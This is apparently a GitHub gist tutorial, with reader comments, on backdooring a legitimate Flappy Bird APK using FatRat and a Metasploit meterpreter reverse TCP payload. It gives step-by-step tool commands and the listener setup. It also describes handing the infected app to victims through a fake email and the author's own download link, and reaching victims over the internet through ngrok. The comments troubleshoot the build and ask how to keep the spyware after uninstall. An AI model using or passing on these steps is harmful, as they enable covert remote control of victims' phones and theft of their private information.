Backdooring Android Apps with FatRat and Metasploit Framework

ANDROID.md

Backdooring Android Apps with FatRat and Metasploit Framework

We have to set a point, mobile applications are a HUGE market today. Many entrepreneurs left behind web-based experiences for building disruptive mobile solutions. The battle of smart-phones remains today between IOs and Android. Both have pros and cons, they are designed and configured with default security settings that maybe not the ideal for non-experienced people.

This writing demonstrates a practical and simple example on how to generate a Reverse TCP back-door on an existing APK file.

This is a pretty common "Social Engineering Attack", and it's focused on generating a reverse TCP connection, where the attacker easily can generate shell access to your Android phone in the time you are using the infected application and do some harmful stuff or access your private information without any concern.

And when a mean “Social Engineering Attacks” is because the way it propagates, I’ll explain in a bit how are the typical phases of this attacks.

This demo was created on a controller and local lab, but it can be done on WAN networks easily.

Social Engineering (in simple words)

n order to explain the concept very clearly, we can split the term into two elements, where Social can set up as personal and professional lives, Engineering refers to performing tasks by following certain steps to achieving targets. That combined.

Social Engineering is a term that describes nontechnical intrusion that relies heavily on human interaction by tricking other people to break normal security procedures.

It's pretty simple, really. It's all about mocking or tricking people to use or download a Malware and take advantage of it for malicious purposes.

Social Engineering Phases

The attack can be summarized in something like this:

1. Research: tries to gather information about the target, collected from various resources (dumpster living, website, docs, interactions).
2. Hook: makes the initial move by trying to start a conversation with the selected target after the completion of the research phase.
3. Play: make the relationship stronger and continue the dialog to exploit the relationship and get the desired information.
4. Exit: walks out of the attack scene of stops the communication with the target without creating a scene or doing any suspicious.

The working Lab

A virtualized Kali Linux 2018.4 64 bits on Oracle Virtualbox.

A Samsung Galaxy S6 with Android 4.4 Kitkat with some regular security configurations.

Both machines where connected on the same LAN Network.

Tools

The key tool for this workshop is the FatRat Exploitation tool, this program written on Python, can easily generate backdoors on any existing Android application or almost any other device available with known payloads from the Metasploit Framework (and other payloads as well). This tool can perform a lot of other things, you can check the tool's GitHub page here.

The installation process is quite simple, just keep in mind that can take some time because the dependencies installed.

Important: upgrade and update your Kali repositories before install it, this can save you time.

Great, let's install FatRat:

1. Clone the repository from GitHub:

   git clone https://github.com/Screetsec/TheFatRat.git

2. Inside the cloned repository, you will change the permissions on the setup.sh file for making it an executable file

   cd TheFatRat

   chmod +x setup.sh && ./setup.sh

3. Follow the instructions

On the other side, we have the Metasploit Framework, this is an Open Source penetration tool used for developing and executing exploit code against remote target machines. Can be used to test vulnerabilities of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

This amazing tool is already installed on the Kali Linux OS.

Let's pause a bit.

At this moment (if this your first time hearing about Metasploit Framework) I’ll need to go deeper on this explanation, because, there are some key terms that may be a little bit confusing for you. I previously said that this tool is used to test vulnerabilities, right? A vulnerability is a weakness that can compromise the security of any system.

This vulnerability is exploited by using an exploit, this exploit refers to software code which allows an attacker to take advantage of a vulnerability.

And finally, when the vulnerability is exploited, the payload acts, this means, we run some code on the target system for enabling the exploitation to persist on time

With all that said. Let's work.

Hands-on

Let's download a clean APK

In this example, I downloaded the Flappy Bird APK from here

This is the authentic APK game.

I personally renamed the download name to a simple flappybird.apk file and move it from the downloads directory to a custom folder named backdooring-android (this is optional)

Using FatRat

When I was installing FatRat on my Kali, the installer asked if I want to set the fatrat command globally, I said yes, this maybe can be differ from your process

1. By typing fatrat the system will evaluate and configure the necessary and available services
2. Type 5, for Backdooring Original apk [Instagram, Line,etc]
3. Set up the Local Host (LHOST) and Local Port (LPORT). This will represent the Host machine IP address (Kali) and any unused port for hearing back the TCP session handshake (I'll explain this later)
4. Now, we have to type the location path of the flappybird.apk, in my case is on /root/backdooring-android/flappybird.apk
5. Setting up the payload (Metasploit term) for the reverse TCP. Select the option 3: android/meterpreter/reverse_tcp
6. Select 1: Use Backdoor-apk 0.2.2 this is the tool for creating the infected APK

And that's it. Meanwhile FatRat will decompile the original APK and after some internal process will generate a new infected APK with the default name of app_backdoor.apk

After this, we set the generate the listener to no, we are going to generate it manually using Metasploit Framework

Creating the Listener manually

The second part of this attack consists of setting the Host Machine (Kali) as a listener on the bidirectional TCP connection, that’s the main purpose of Reverse TCP shell attack though Social Engineering. The attack will have shell access to the Android machine without the user notice.

Let's start by starting the msfconsole command

> msfconsole

After this, we set the multi/handler exploit like this

> use multi/handler

Later, setting the payload (the same on the FatRat process)

> set PAYLOAD android/meterpreter/reverse_tcp

> set LHOST [the same as your Kali IP]

> set LPORT [The same as FatRat process]

> exploit (running)

Apache on Kali

Checking the Apache service status (it's already installed)

systemctl status apache2

Starting the service

systemctl start apache2

Placing the infected backdoor (renamed-or-not) for the victims

/var/www/html/ directory

Concluding

In this LAN network environment, the attacker needs to expose this new infected APK on the Apache Server to the victim, by sending a fake email with the link or any other way for tricking the people to download the new "FlappyBird.apk" on their Android device.

Once the victim downloads the application and opens it, a new session on the listener will be created successfully, using the meterpreter (payload) shell. The attacker have now the complete access to target custom attacks or perform some privilege escalation from the CLI.

You can list the sessions, like:

> sessions

And you also can select and interact with an active session using the -i flag

> sessions -i 1

My resulting APK

You can download my infected FlappyBird.apk file here

I'm not pretty sure if by setting your Kali machine with an static IP address just like the one I used to, can make this Malware works correctly. But, if it's the case, my working IP address was a class C IP address 192.168.2.120 and the 4444 port.

From LAN to WAN

A simple way to scaling a local IP address is using a simple tunneling tool called ngRok. This tool convert a simple 127.0.0.1 to something accessible to all public.

Check the docs for installation steps and authtoken setup.

After that you can set the ngrok command for TCP connections, like:

> ngrok tcp 1234 for TCP protocol on the 1234 protocol

The whole process is the same, but you will need to replace the LHOST (Web interface from ngrok) and LPORT (the port from the ngrok TCP connection) to the elements that ngrok provided to you.

Tips for preventing

1. Keep your Android device up to date (patches and OS version)
2. NEVER download any .apk from non-trusted sources
3. Always check the URL for intentional misspelled domain names
4. Educate yourself

Happy Hunting :)

Do I need to get my phone rooted

Hi, when going to metasploit after starting the session. The command sysinfo does not work. ANd if I hit help it doesn't give me the commands for searching inside the phone. WHat could be worng?

Do I need to get my phone rooted

Hello, @n1lby73, I did this a while ago, as long I can remember you don't need your phone rooted.

I will revisit this ASAP and post an update to this. Thanks for your message man, I really appreciate it

Hi, when going to metasploit after starting the session. The command sysinfo does not work. ANd if I hit help it doesn't give me the commands for searching inside the phone. WHat could be worng?

Did you place the correct IP and Port? Maybe settings in the FatRat tool were changed. I will update this gist ASAP. Thanks for your message. I need to revisit this tool again.

Hi, I managed to make it work. Their are two problems now. I'm using ngrok for tunneling, and the session dies after a couple of minutes. And the other problem is dump_contacts doesn't work.

Hi, i have some issues with the compiling, kept showing "Failed to recompile original project with backdoor". I have tried some solutions like chaning my Java into java-8, and also downloaded lib32. However, it still doesn't work, do you have any solution for it?

Hi, i have some issues with the compiling, kept showing "Failed to recompile original project with backdoor". I have tried some solutions like chaning my Java into java-8, and also downloaded lib32. However, it still doesn't work, do you have any solution for it?

Hello buddy, this is an outdated hands-on demo that I built for one freelance client a couple of years ago.

The logical assumption that I can see is that it refers to a problem with the FatRat dependencies itself, my recommendation is to refer directly to the repository and check for the specific issue, I just did it, and still are some exact open issues like yours.

Check closed issues first to discard any un-attended configuration and then move on to the open ones.

Ahh I see! Alright, Thank you so much! I will go around and take a look!

What if the user uninstalls flappybird? I mean the game should uninstall and icon should disappear but our spyware shouldnot.

Greate post. Thank you. So will Android 9 ignore an APK with the payload? I just test on a real device but something not happens.

[!] Failed to locate smali file to hook. This error faces me every time i try to create this backdoor. Also you forgot to document what to select when it ask you if you want to merge and shuffle the permissions or keep original.

[!] Failed to locate smali file to hook. This error faces me every time i try to create this backdoor. Also you forgot to document what to select when it ask you if you want to merge and shuffle the permissions or keep original.

so were you able to go past the smali file , I am also getting the same error.

[!] Failed to locate smali file to hook. This error faces me every time i try to create this backdoor. Also you forgot to document what to select when it ask you if you want to merge and shuffle the permissions or keep original.

so were you able to go past the smali file , I am also getting the same error.

This does not work anymore
the technique to hook the payload in the smali file is years old and any tool created 2 to 3 years back does not work now

I am same working but This apk not work mobile phone, Please give solution. Not first hack my phone